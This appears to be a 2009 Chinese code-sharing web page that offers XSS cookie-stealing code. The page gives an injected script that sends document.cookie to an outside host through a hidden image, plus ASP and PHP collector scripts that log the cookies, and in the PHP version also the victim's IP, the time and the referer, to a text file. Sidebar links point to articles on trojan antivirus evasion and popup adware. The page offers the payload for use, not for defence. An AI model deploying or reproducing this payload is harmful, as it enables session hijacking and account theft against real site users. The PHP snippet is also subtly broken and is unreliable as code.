当前位置：代码网 > 服务器>网络安全>企业安全 > asp php XSS获取cookie的代码

asp php XSS获取cookie的代码

2009年04月20日 • 企业安全 •我要评论

asp php XSS获取cookie的代码<script>document.write('<img src="http://url/news.asp?msg='+document.cookie+'" width=0 height=0 border=0 />');</script> news.asp代码： <%... 09-04-20

                    
						<script>document.write('<img src="http://url/news.asp?msg='+document.cookie+'" width=0 height=0 border=0 />');</script> 
news.asp代码： 
<% 
msg=request.servervariables("query_string") 
testfile=server.mappath("cook.txt") 
set fs=server.createobject("scripting.filesystemobject") 
set thisfile=fs.opentextfile(testfile,8,true,0) 
thisfile.writeline(""&msg& "") 
thisfile.close 
set fs = nothing 
%> 

php版代码： 
<?php 
$cookie = $_get['c']; 
$ip = getenv ('remote_addr'); 
$time=date("j f, y, g:i a"); 
$referer=getenv ('http_referer'); 
$fp = fopen('cook.txt', 'a'); 
fwrite($fp, 'cookie: '.$cookie.'<br> ip: ' .$ip. '<br> date and time: ' 

.$time. '<br> referer: '.$referer.'<br><br><br>'); 
fclose 
?>
						
						
					

                    

木马免杀绝招以及常用的修改方法

木马免杀绝招以及常用的修改方法常用的木马免杀方法绝招一：快速搞定瑞星文件查杀操作步骤：　第一步：用OD载入，来到程序的入口点。　 ...常用的木马免杀方法 ... [阅读全文]
弹窗口的流氓软件核心代码

弹窗口的流氓软件核心代码ps:请勿用于非法用途，仅供技术研究之用。 by：yunshu 这个东西的主要功能就是去网上一个URL读取配置文件，拿到需要弹出的窗口... [阅读全文]
CSRF—攻击与防御

CSRF—攻击与防御 0x01 什么是CSRF攻击CSRF是Cross Site Request Forgery的缩写（也缩写为XSRF），直译过来就是跨站请... [阅读全文]
黑客入侵网络的五十种方法

黑客入侵网络的五十种方法现在网上的攻击事件越来越多，黑客都是通过什么方法来攻击我们的呢？下面我们给大家总结了黑客入侵网络的五十种方法，让大家做到有备无患。 ... [阅读全文]
实战讲解跨站入侵攻击

实战讲解跨站入侵攻击很多时候在企业网络安全，特别是服务器上数据库安全防范方面需要特别注意，弥补所有漏洞，减少因设置不当带来的入侵事件的发生。然而在实际使用与维护过程中我们经常会…

2008年10月08日 • 网络安全
关于趋势科技等网站被攻击的分析

关于趋势科技等网站被攻击的分析一. 首先在网上找到了这次攻击的新闻报道http://www.nsfocus.net/news/6697 http://hi.... [阅读全文]

发表评论


验证码：

asp php XSS获取cookie的代码

2009年04月20日 • 企业安全 •我要评论

相关文章:

实战讲解跨站入侵攻击

发表评论